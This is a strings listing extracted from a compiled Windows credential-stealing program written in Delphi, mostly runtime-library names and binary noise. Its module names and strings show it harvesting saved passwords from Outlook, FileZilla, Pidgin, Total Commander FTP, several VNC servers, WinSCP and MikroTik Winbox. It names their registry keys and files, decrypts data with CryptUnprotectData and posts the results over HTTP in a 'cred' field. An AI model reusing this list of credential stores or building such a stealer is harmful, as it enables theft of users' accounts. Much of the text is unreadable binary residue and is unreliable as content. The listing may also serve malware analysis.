This program must be run under Win32
.idata
.edata
P.reloc
P.rsrc
StringX
TObjectd
TObjectX
System
IInterface
System
TInterfacedObject
YZ]_^[
Ht Ht.
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
ZTUWVSPRTj
_^[YY]
_^[YY]
tDhLV@
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
Exception
EHeapException
EOutOfMemory
EInOutError
EExternal
EExternalException
EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide
EOverflow
EUnderflow
EInvalidPointer
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
<*t"<0r=<9w9i
INFNAN
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
t%HtIHtm
_^[YY]
$Z]_^[
QQQQQQSVW3
QQQQQSVW
_^[YY]
TErrorRec
TExceptRec
$YZ]_^[
m/d/yy
mmmm d, yyyy
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
YZ]_^[
YZ]_^[
YZ]_^[
83825c0b5bab0732b1ef4b9d1f93bb55
9f8599;=07d5`6cd`5<
ea4bb7w=Ds
nkhz`q
QQQQQQQSVW
0x%.2x%.2x%.2x%.2x%.2x%.2x
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
!!!!<own>!
Winbox
abcdefghijklmnopqrstuvwxyz1234567890,.:@#$%^&*(){}~<>?
QQQQQQQSVW
\Mikrotik\Winbox\Addresses.cdb
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantTypeX
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgError
EVariantBadVarTypeError
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedError|
EVariantDispatchError
QQQQSV
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
String
Array
ByRef
Variants
_^[YY]
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerErrorD
EReadError
EWriteError
EListError
EStringListError
TThreadListh
TPersistent
TPersistenth
Classes
IStringsAdapter
Classes
TStrings
TStrings< A
Classes
TStringItem
TStringList
TStringListl A
Classes
TStream
THandleStream
TFileStream
TRegGroup
TRegGroups
Strings
S$_^[Y]
_^[YY]
SdZ]_^[
$Z]_^[
_^[YY]
ERegistryException
TRegistryS
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Outlook
IMAP User
IMAP Password
POP3 User
POP3 Password
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
QQQQQQSVW
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
QQQQQQ
<Host>
</Host>
FileZilla
<User>
</User>
<Pass encoding="base64">
</Pass>
\FileZilla\sitemanager.xml
PSAPI.dll
EnumProcesses
EnumProcessModules
GetModuleBaseNameA
GetModuleFileNameExA
GetModuleBaseNameW
GetModuleFileNameExW
GetModuleInformation
EmptyWorkingSet
QueryWorkingSet
InitializeProcessForWsWatch
GetMappedFileNameA
GetDeviceDriverBaseNameA
GetDeviceDriverFileNameA
GetMappedFileNameW
GetDeviceDriverBaseNameW
GetDeviceDriverFileNameW
EnumDeviceDrivers
GetProcessMemoryInfo
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\.purple\accounts.xml
\Wcx_ftp.ini
username=
password=
Local Settings\Software\Microsoft\Windows\Shell\MuiCache
\wcx_ftp.ini
\wcx_ftp.ini
SOFTWARE\RealVNC\vncserver\Password
SOFTWARE\RealVNC\vncserver\RfbPort
SOFTWARE\RealVNC\vncserver\HttpPort
RealVNC
SOFTWARE\RealVNC\WinVNC4\Password
SOFTWARE\RealVNC\WinVNC4\PortNumber
SOFTWARE\TightVNC\Server\Password
SOFTWARE\TightVNC\Server\RfbPort
SOFTWARE\TightVNC\Server\HttpPort
TightVNC
SOFTWARE\TightVNC\Server\PasswordViewOnly
QQQQQQQ3
SOFTWARE\TigerVNC\WinVNC4\Password
SOFTWARE\TigerVNC\WinVNC4\PortNumber
SOFTWARE\TigerVNC\WinVNC4\HTTPPortNumber
TigerVNC
QQQQSVW
HostName=
UserName=
Password=
WinSCP
\winscp.ini
WinScp
Local Settings\Software\Microsoft\Windows\Shell\MuiCache
winscp
QQQQQQQQ
Software\Martin Prikryl\WinSCP 2\Sessions\
\HostName
\UserName
\Password
WinSCP
Software\Martin Prikryl\WinSCP 2\Sessions
HTTP/1.1
Host:
Content-Length:
Content-Type: application/x-www-form-urlencoded
QQQQQQQS
&cred=
Runtime error at 00000000
0123456789ABCDEF
Qkkbal
;3+#>6.&
'2, /+0&7!4-)1#
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
TlsFree
TlsAlloc
LocalFree
LocalAlloc
advapi32.dll
RegQueryValueExA
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyA
RegFlushKey
RegEnumValueA
RegEnumKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
IsValidSid
GetTokenInformation
GetSidSubAuthorityCount
GetSidSubAuthority
GetSidIdentifierAuthority
kernel32.dll
WriteFile
WideCharToMultiByte
WaitForSingleObject
VirtualQuery
SetLastError
SetFilePointer
SetEvent
SetEndOfFile
ResetEvent
ReadFile
OpenProcess
LocalFree
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
HeapFree
HeapAlloc
GetVersionExA
GetThreadLocale
GetStringTypeExA
GetStdHandle
GetProcessHeap
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentThread
GetCurrentProcess
GetCPInfo
GetACP
FormatMessageA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateMutexA
CreateFileA
CreateEventA
CompareStringA
CloseHandle
user32.dll
MessageBoxA
LoadStringA
GetSystemMetrics
CharNextA
CharUpperBuffA
CharToOemA
kernel32.dll
wsock32.dll
WSACleanup
WSAStartup
gethostname
gethostbyname
socket
inet_ntoa
connect
closesocket
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
crypt32.dll
CryptUnprotectData
cred.dll
0,080<0@0D0H0L0P0T0`0m0
1 1(1,1014181<1@1D1H1b1j1r1z1
2"2*222:2B2J2R2Z2b2j2r2z2
3!3N3Y3(4/4
;,;7;B;J;T;^;h;~;
< <'<2<8<E<J<o<y<
2F2K2P2
585>5P5h5t5|5
5+63696?6r6
6T7\7b7h7u7{7
949@9H9
:3:L:e:v:
=@=G=N=
1,333D3P3
5,5H5`5q5}5
8+8I8_8v8
;.<B<J<`<x<
=C=p=y=
0&0>0`0
2"2M2V2]2
3 3*3O3Y3c3k3q3
9!999@9
:3:<:H:O:i;
0#0*040>0U0f0s0z0~0
1(121:1B1J1R1Z1b1
2H2P2^2c2|2
3"3/3;3H3Z3b3j3r3z3
424:4B4J4R4Z4b4j4r4z4
5"5*525:5B5J5R5Z5b5j5r5z5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
9$909D9L9P9T9X9\9`9d9h9l9z9
: :$:(:,:0:D:d:l:p:t:x:|:
; ;$;(;,;0;4;8;<;T;t;|;
<$<,<0<4<8<<<@<D<H<L<\<|<
=0=8=<=@=D=H=L=P=T=X=h=
>8>@>D>H>L>P>T>X>\>`>p>
?(?H?P?T?X?\?`?d?h?l?p?
0 0$0(0,0<0\0d0h0l0p0t0x0|0
1 1$1(1,1014181L1l1t1x1|1
2(2024282<2@2D2H2L2P2d2
3)313@3M3U3p3
4 4$4(4@4L4P4l4t4x4|4
9 9-929<9L9W9d9i9
%1)1-1115191=1A1E1I1M1Q1U1Y1]1a1e1i152<2
5%5-555
6/7E7[7B8V8
8"9C9T9k9
:J:^:o:
?E?J?X?{?
0C1[1m1
3/3F3X3r4
5'6,6F6k6
7#7B7T7~7
8 999F9_9n9
;0;D;M;
<Y<t<}<
1A2S2g2
3#323N3~3
4 4%4-464B4G4P4Y4b4k4t4
5.5X5r5
;-;8;=;B;O;e;l;~;
="=+=F=Y=b=
>#>E>T>b>
1 1X1_1n1u1
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8(8,84888@8D8L8P8X8\8d8h8p8t8|8
9$9(90949<9@9H9L9T9X9`9d9l9p9x9|9
:':-:7:B:L:W:a:l:v:
;#;/;7;A;L;T;Y;
6/7;7H7Z7
8"848F8m8
;K=W=d=v=
1%2O2[2h2z2
494Z4u4z4
6?6Z6r6
7?8K8R8d8v8
829h9u9
:@:M:v:
="=*=2=u=
>">->3>8>C>I>N>Y>_>d>o>u>z>
? ?%?*?5?;?@?K?Q?V?a?
1,14181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
2 2<2\2d2h2l2p2t2x2|2
3$3,3034383<3@3D3H3L3h3
404P4X4\4`4d4h4l4p4t4x4
5 5(5,5054585<5@5D5H5d5
606P6X6\6`6d6h6l6p6t6x6
7?7N7e7
7/8>8U8}8
:-:<:S:b:v:
272R2h2
5"5&585P5[7_7c7g7k7o7s7w7{7
<!<%<)<-<1<5<9<=<A<E<W<o<m>q>u>y>}>
3(4=4R4W4d4
6"7/7:7[7q7
8'838;8E8J8O8T8Y8_8d8i8o8v8|8
9$9,949C9O9\9n9
:*:0:P:X:\:`:d:h:l:p:t:x:
; ;$;(;,;0;4;H;h;p;t;x;|;
< <$<(<,<0<4<8<<<@<P<p<x<|<
= =(=,=0=4=8=<=@=D=H=`=
>,>8><>D>H>L>P>T>X>\>`>d>h>l>p>z>~>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0 000@0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1!1%181X1`1d1h1l1p1t1x1|1
2 2@2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,30343j3y3
6@7c7}7
:3:w:~:
636E6b6
6 7F7y7
9#:Y:x:
3Q4]4l4
5T5Y5x5
=!=5=?=S=b=
> >*>4>C>M>_>w>
>#?/?6?A?S?f?l?
0"0G0N0
6(757D7R7a7p7
81969;9B9G9Q9X9g9{9
;!;0;D;h;
0;0G0T0f0
232H2p2
3F3N3U3t3J4X4
6 646U6r6
7&747M7Z7_7l7q7~7
8 8%82878D8I8V8[8h8m8z8
;';4;F;O;
<6=G=\=
=>>S>l>
?$?+?~?
1"141F1S1_1l1~1
314<4o4
7$7+7b7%8=8
;';;;G;N;`;r;
X0g0v0
1-1<1I1
4!4K4V4p4
5 525D5T5Y5^5e5j5r5w5
6>6E6\6
898@8O8i8{8
9+9=9M9R9W9^9c9k9p9y9
: :):I:P:g:t;
< </<I<[<m<}<
>+>7>>>H>Z>j>
5"5'515;5]5d5
:=:E:g:o:
=,=>=~= >(>->2>:>?>]>b>g>l>
1%1,131:1
2%2G2Y2j2z2
3S3f3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4
<0@0D0
0X1`1d1
2 2$2(2,2024282<2@2D2
3 3(383<3H3T3X3\3`3d3
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
TlHelp32
System
SysInit
KWindows
UTypes
Base64
8Registry
"RTLConsts
^Classes
SysConst
3Messages
SysUtils
CVariants
$VarUtils
QTypInfo
sActiveX
IniFiles
MiniReg64
Stealer_Var
Stealer_WinSCP
Stealer_VNC
WinSock
|Stealer_TotalCmd
Stealer_Pidgin
PStealer_FileZilla
rStealer_MSOutlook
Stealer_Winbox
UserSid
DVCLAL
PACKAGEINFO
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Stream read error
Failed to get data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Stream write error
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Cannot assign a %s to a %s%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid property value
Invalid data type for '%s'
January
February
August
September
October
November
December
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
%s A call to an OS function failed
Variant or safe array is locked Invalid variant type conversion
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant overflow
Invalid argument
Invalid variant type
Operation not supported
Unexpected variant error
External exception %x
Assertion failed
Interface not supported
Exception in safecall method
%s (%s, line %d)
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Access violation
Stack overflow
Control-C hit
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Write$Error creating variant or safe array)Variant or safe array index out of bounds
Out of memory
I/O error %d
File not found
Invalid filename
Too many open files
File access denied
Read beyond end of file
Disk full
Invalid numeric input
Division by zero
Range check error
Integer overflow Invalid floating point operation Floating point division by zero
Floating point overflow
Floating point underflow